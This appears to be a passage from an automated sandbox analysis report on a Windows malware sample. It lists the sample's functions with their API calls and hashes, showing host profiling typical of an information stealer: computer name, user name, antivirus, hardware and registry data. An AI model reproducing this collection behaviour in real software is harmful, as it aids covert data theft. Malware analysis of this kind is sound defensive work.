                                                                                                                                                                                          • Opcode ID: 2f836020cc8545b78d2012706a95e89bbe9eaf8b2ffdc362c5a33ddd020b5c05
                                                                                                                                                                                          • Instruction ID: 6d522a472790c3b7b39de4407035d5dde24c80b69bcc72fbd43700b4d4e5d023
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f836020cc8545b78d2012706a95e89bbe9eaf8b2ffdc362c5a33ddd020b5c05
                                                                                                                                                                                          • Instruction Fuzzy Hash: DDF03675640208FBEF115B90EC4FFAE7A7DEB48705F150154F605A9091D6B15980D770
                                                                                                                                                                                          Function 0003566F Relevance: 9.1, APIs: 6, Instructions: 107registrystringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 000356A4
                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 000356C4
                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 000356EA
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 000356F6
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00035725
                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 00035738
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$CloseOpenQueryValue_memset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3891774339-0
                                                                                                                                                                                          • Opcode ID: 65b1b1eef90a6a89d5f8a203932ebf2f6a40421aeeed1c81a968df5e58564b03
                                                                                                                                                                                          • Instruction ID: a85bc405df8b476b5d60405ea161e7d8ba5f3d10a57a9cc9b891e7d3de2f5c8e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 65b1b1eef90a6a89d5f8a203932ebf2f6a40421aeeed1c81a968df5e58564b03
                                                                                                                                                                                          • Instruction Fuzzy Hash: A7419C7584002D9FCF15AB20FC8AEE977B9BB18309F5104E5B51CA3162EE715ED68FA0
                                                                                                                                                                                          Function 00027FAC Relevance: 9.1, APIs: 6, Instructions: 60filememoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0002E756,?,?,?), ref: 00027FC7
                                                                                                                                                                                          • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0002E756,?,?,?), ref: 00027FDE
                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0002E756,?,?,?), ref: 00027FF5
                                                                                                                                                                                          • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0002E756,?,?,?), ref: 0002800C
                                                                                                                                                                                          • LocalFree.KERNEL32(0002ECBC,?,?,?,?,0002E756,?,?,?), ref: 0002802B
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,0002E756,?,?,?), ref: 00028034
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2311089104-0
                                                                                                                                                                                          • Opcode ID: 54f620453bda81ed911a4669f1d6562f441540ef6e38858c28df574c5a20c6e2
                                                                                                                                                                                          • Instruction ID: a3618e326d9be162961380d8283e5e7a4d39fdaa867443405890016ccab4e6ea
                                                                                                                                                                                          • Opcode Fuzzy Hash: 54f620453bda81ed911a4669f1d6562f441540ef6e38858c28df574c5a20c6e2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B116D74901214FFDF619FA4EC8CEAE7BB8EB48740F204588F841E6150EB719E85DB21
                                                                                                                                                                                          Function 00031757 Relevance: 9.1, APIs: 6, Instructions: 58commemoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0003175E
                                                                                                                                                                                          • CoCreateInstance.OLE32(000531B0,00000000,00000001,0005AF60,?,00000018,00031901,?), ref: 00031781
                                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 0003178E
                                                                                                                                                                                          • _wtoi64.MSVCRT ref: 000317C1
                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 000317DA
                                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 000317E1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 181426013-0
                                                                                                                                                                                          • Opcode ID: f558dbfd9f2333258645b2d56c011bb83dfbb6df44e276d380a4a36355a17f5d
                                                                                                                                                                                          • Instruction ID: 1a5ba02b232a6b67fe028d1b908ef75e4dec8693ff9cb02fbee31ce342bac424
                                                                                                                                                                                          • Opcode Fuzzy Hash: f558dbfd9f2333258645b2d56c011bb83dfbb6df44e276d380a4a36355a17f5d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 721146B0A0434ADFCB019FA4CC889EEBBBAAF49301F1440A9F605E72A1CB354945CB65
                                                                                                                                                                                          Function 00031684 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 000316CE
                                                                                                                                                                                            • Part of subcall function 000323D5: malloc.MSVCRT ref: 000323DA
                                                                                                                                                                                            • Part of subcall function 000323D5: strncpy.MSVCRT ref: 000323EB
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 000316F6
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00056ECC,?,?,?,?,?), ref: 00031713
                                                                                                                                                                                          • GetCurrentHwProfileA.ADVAPI32(?), ref: 0003169F
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
                                                                                                                                                                                          • String ID: Unknown
                                                                                                                                                                                          • API String ID: 2781187439-1654365787
                                                                                                                                                                                          • Opcode ID: 9a1c289164a26e1fb434a88593a248e06d4292ad4b39ce49dd677e0a9af6d3e8
                                                                                                                                                                                          • Instruction ID: 1bc1ae2ef8a8b65d1a690878473dcef7ef9f07a642bca5c4f3be81a3c7a51616
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a1c289164a26e1fb434a88593a248e06d4292ad4b39ce49dd677e0a9af6d3e8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A110375900228ABDB21ABA4DC56BDE73BCAB18710F4004A5BA45E7152DA74AF848F54
                                                                                                                                                                                          Function 00031119 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00056910,Display Resolution: ,000568F4,00000000,User Name: ,000568E4,00000000,Computer Name: ,000568D0,AV: ,000568C4,Install Date: ), ref: 00031131
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00031138
                                                                                                                                                                                          • GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00031154
                                                                                                                                                                                          • wsprintfA.USER32 ref: 0003117A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                          • String ID: %d MB
                                                                                                                                                                                          • API String ID: 3644086013-2651807785
                                                                                                                                                                                          • Opcode ID: 722938e9d9150f6fd56e9ae6c120de7673d51d80af9e863ba56b7325782cf14e
                                                                                                                                                                                          • Instruction ID: 813edfe89c271e05895ac310ccc952285df93e8e76457a69f1cfcde7f0bbf95e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 722938e9d9150f6fd56e9ae6c120de7673d51d80af9e863ba56b7325782cf14e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3101AE71A00218ABEB14DFB4DC49EFF77BCDF08700F450055F605EB191D67099418765
                                                                                                                                                                                          Function 6C42C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?), ref: 6C42C947
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C42C969
                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?), ref: 6C42C9A9
                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C42C9C8
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C42C9E2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Virtual$AllocInfoSystem$Free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4191843772-0
                                                                                                                                                                                          • Opcode ID: 72cbaedc4c144eab83eba0cd87f14d0f8a044162151b3bfbfd41c03ef0a4c3be
                                                                                                                                                                                          • Instruction ID: 582d53d7b512274e140dc703e216eb5070fd718ecbf648f80983f89cb968174c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 72cbaedc4c144eab83eba0cd87f14d0f8a044162151b3bfbfd41c03ef0a4c3be
                                                                                                                                                                                          • Instruction Fuzzy Hash: D021C272782224ABEB14FE24D885FAE73B9EB46744F60011AF947E7B80DB6098048790
                                                                                                                                                                                          Function 00024AB6 Relevance: 7.6, APIs: 5, Instructions: 50stringnetworkCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AE8
                                                                                                                                                                                          • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AEE
                                                                                                                                                                                          • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AF4
                                                                                                                                                                                          • lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00024B06
                                                                                                                                                                                          • InternetCrackUrlA.WININET(000000FF,00000000), ref: 00024B0E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CrackInternetlstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1274457161-0
                                                                                                                                                                                          • Opcode ID: a1f721b88df60240ee8010bbdc2907b9c19d1b89118e23c63fa530901dc7b580
                                                                                                                                                                                          • Instruction ID: fdf4dbde795b4e1e6cf3efb4e3c57b3c85b138d7dfbe9e52d405f749c2175871
                                                                                                                                                                                          • Opcode Fuzzy Hash: a1f721b88df60240ee8010bbdc2907b9c19d1b89118e23c63fa530901dc7b580
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B011B32D00218ABDF149BA9EC49ADEBFB8AF55330F108216F925F72E0DA7456058B94
                                                                                                                                                                                          Function 00030F51 Relevance: 7.5, APIs: 5, Instructions: 35registrymemoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00034252,Processor: ,[Hardware],00056950,00000000,TimeZone: ,00056940,00000000,Local Time: ,0005692C), ref: 00030F65
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,00034252,Processor: ,[Hardware],00056950,00000000,TimeZone: ,00056940,00000000,Local Time: ,0005692C,Keyboard Languages: ,00056910), ref: 00030F6C
                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00056888,?,?,?,00034252,Processor: ,[Hardware],00056950,00000000,TimeZone: ,00056940,00000000,Local Time: ), ref: 00030F8A
                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00056888,00000000,00000000,00000000,000000FF,?,?,?,00034252,Processor: ,[Hardware],00056950,00000000,TimeZone: ,00056940,00000000), ref: 00030FA6
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00056888,?,?,?,00034252,Processor: ,[Hardware],00056950,00000000,TimeZone: ,00056940,00000000,Local Time: ,0005692C,Keyboard Languages: ,00056910), ref: 00030FAF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3466090806-0
                                                                                                                                                                                          • Opcode ID: 6d61617b92facd18da77ddccdd72a0ce3507e36d504d265840b2b588ca5b2420
                                                                                                                                                                                          • Instruction ID: e60956ad5393697ffa64e7db9e7118bc8b39a05eefc3da9de905c780e8e0416e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d61617b92facd18da77ddccdd72a0ce3507e36d504d265840b2b588ca5b2420
                                                                                                                                                                                          • Instruction Fuzzy Hash: DAF03075640208FFEF105B90FC0EFAE7B7CEB48705F1500A4F609A90A0E7B099909B70
                                                                                                                                                                                          Function 000283D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetEnvironmentVariableA.KERNELBASE(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,0002DB0A), ref: 000283F2
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00030549: lstrlenA.KERNEL32(?,?,00037174,000566CF,000566CE,?,?,?,?,0003858F), ref: 0003054F
